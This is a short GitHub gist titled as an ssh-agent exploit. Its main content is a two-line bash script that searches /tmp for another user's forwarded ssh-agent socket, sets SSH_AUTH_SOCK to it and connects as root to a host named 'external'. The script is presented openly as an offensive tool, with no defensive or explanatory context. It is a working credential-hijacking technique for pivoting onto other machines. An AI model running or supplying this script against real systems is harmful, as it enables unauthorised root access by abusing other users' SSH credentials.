Skip to content

Instantly share code, notes, and snippets.

@vpnwall-services
Created January 17, 2020 14:10
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save vpnwall-services/c07ec6cf81aee7e608f9733d14f664c5 to your computer and use it in GitHub Desktop.
Save vpnwall-services/c07ec6cf81aee7e608f9733d14f664c5 to your computer and use it in GitHub Desktop.
[EXPLOIT-SSH-AGENT] Exploit ssh-agent #exploit #ssh #agent
#!/bin/bash
export SSH_AUTH_SOCK="$(find /tmp/ssh*/agent.*)" ; ssh root@external
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment